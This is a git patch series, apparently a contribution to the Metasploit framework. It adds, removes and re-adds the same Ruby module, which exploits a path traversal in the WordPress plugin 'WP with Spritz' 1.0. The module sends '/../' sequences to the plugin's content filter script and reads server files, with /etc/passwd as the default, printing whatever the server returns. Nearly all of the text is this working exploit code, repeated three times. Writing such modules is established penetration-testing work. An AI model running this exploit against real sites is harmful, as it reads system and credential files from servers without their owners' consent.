From 0ddfad506a1872ba6a4901535dd021b3218fee51 Mon Sep 17 00:00:00 2001 From: Mateus Lino Date: Sun, 29 Apr 2018 23:52:00 -0300 Subject: [PATCH 1/3] Create scannerwp_with_spritz.rb --- modules/auxiliary/scannerwp_with_spritz.rb | 51 ++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 modules/auxiliary/scannerwp_with_spritz.rb diff --git a/modules/auxiliary/scannerwp_with_spritz.rb b/modules/auxiliary/scannerwp_with_spritz.rb new file mode 100644 index 0000000..010c1bc --- /dev/null +++ b/modules/auxiliary/scannerwp_with_spritz.rb @@ -0,0 +1,51 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress Plugin WP with Spritz 1.0', + 'Description' => %q{ + This is module exploit a Path Transversal in wordpress plugin "WP with Spritz" at version 1.0 + }, + 'References' => + [ + ['EDB', '44544'] + ], + 'Author' => + [ + 'Wadeek', # Vulnerability discovery + 'Mateus Lino ' # Metasploit module + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('FILEPATH', [true, 'The path ', '/etc/passwd']), + OptInt.new('DEPTH', [true, 'Traversal Depth ', 4 ]) + ]) + end + def run_host(ip) + transversal = "/../" * datastore['DEPTH'] + filename = datastore['FILEPATH'] + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-with-spritz', 'wp.spritz.content.filter.php'), + 'vars_get' => + { + 'url' => "#{transversal}#{filename}" + }) +if res.code == 200 + print_good("Path Exploitable:") + print_status(res.body) +else + print_error("Nothing was found.") +end + end +end From 8d78a91ae78b1469bc90b66e9b5fb75380c75b00 Mon Sep 17 00:00:00 2001 From: Mateus Lino Date: Sun, 29 Apr 2018 23:52:12 -0300 Subject: [PATCH 2/3] Delete scannerwp_with_spritz.rb --- modules/auxiliary/scannerwp_with_spritz.rb | 51 ---------------------- 1 file changed, 51 deletions(-) delete mode 100644 modules/auxiliary/scannerwp_with_spritz.rb diff --git a/modules/auxiliary/scannerwp_with_spritz.rb b/modules/auxiliary/scannerwp_with_spritz.rb deleted file mode 100644 index 010c1bc..0000000 --- a/modules/auxiliary/scannerwp_with_spritz.rb +++ /dev/null @@ -1,51 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## -class MetasploitModule < Msf::Auxiliary - include Msf::Auxiliary::Report - include Msf::Exploit::Remote::HTTP::Wordpress - include Msf::Auxiliary::Scanner - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'WordPress Plugin WP with Spritz 1.0', - 'Description' => %q{ - This is module exploit a Path Transversal in wordpress plugin "WP with Spritz" at version 1.0 - }, - 'References' => - [ - ['EDB', '44544'] - ], - 'Author' => - [ - 'Wadeek', # Vulnerability discovery - 'Mateus Lino ' # Metasploit module - ], - 'License' => MSF_LICENSE - )) - - register_options( - [ - OptString.new('FILEPATH', [true, 'The path ', '/etc/passwd']), - OptInt.new('DEPTH', [true, 'Traversal Depth ', 4 ]) - ]) - end - def run_host(ip) - transversal = "/../" * datastore['DEPTH'] - filename = datastore['FILEPATH'] - res = send_request_cgi( - 'method' => 'GET', - 'uri' => normalize_uri(wordpress_url_plugins, 'wp-with-spritz', 'wp.spritz.content.filter.php'), - 'vars_get' => - { - 'url' => "#{transversal}#{filename}" - }) -if res.code == 200 - print_good("Path Exploitable:") - print_status(res.body) -else - print_error("Nothing was found.") -end - end -end From 945a4b46286ec177da84a6554b2f727bf3ad9a93 Mon Sep 17 00:00:00 2001 From: Mateus Lino Date: Sun, 29 Apr 2018 23:52:59 -0300 Subject: [PATCH 3/3] Create wp_with_spritz.rb --- .../auxiliary/scanner/http/wp_with_spritz.rb | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 modules/auxiliary/scanner/http/wp_with_spritz.rb diff --git a/modules/auxiliary/scanner/http/wp_with_spritz.rb b/modules/auxiliary/scanner/http/wp_with_spritz.rb new file mode 100644 index 0000000..010c1bc --- /dev/null +++ b/modules/auxiliary/scanner/http/wp_with_spritz.rb @@ -0,0 +1,51 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress Plugin WP with Spritz 1.0', + 'Description' => %q{ + This is module exploit a Path Transversal in wordpress plugin "WP with Spritz" at version 1.0 + }, + 'References' => + [ + ['EDB', '44544'] + ], + 'Author' => + [ + 'Wadeek', # Vulnerability discovery + 'Mateus Lino ' # Metasploit module + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('FILEPATH', [true, 'The path ', '/etc/passwd']), + OptInt.new('DEPTH', [true, 'Traversal Depth ', 4 ]) + ]) + end + def run_host(ip) + transversal = "/../" * datastore['DEPTH'] + filename = datastore['FILEPATH'] + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-with-spritz', 'wp.spritz.content.filter.php'), + 'vars_get' => + { + 'url' => "#{transversal}#{filename}" + }) +if res.code == 200 + print_good("Path Exploitable:") + print_status(res.body) +else + print_error("Nothing was found.") +end + end +end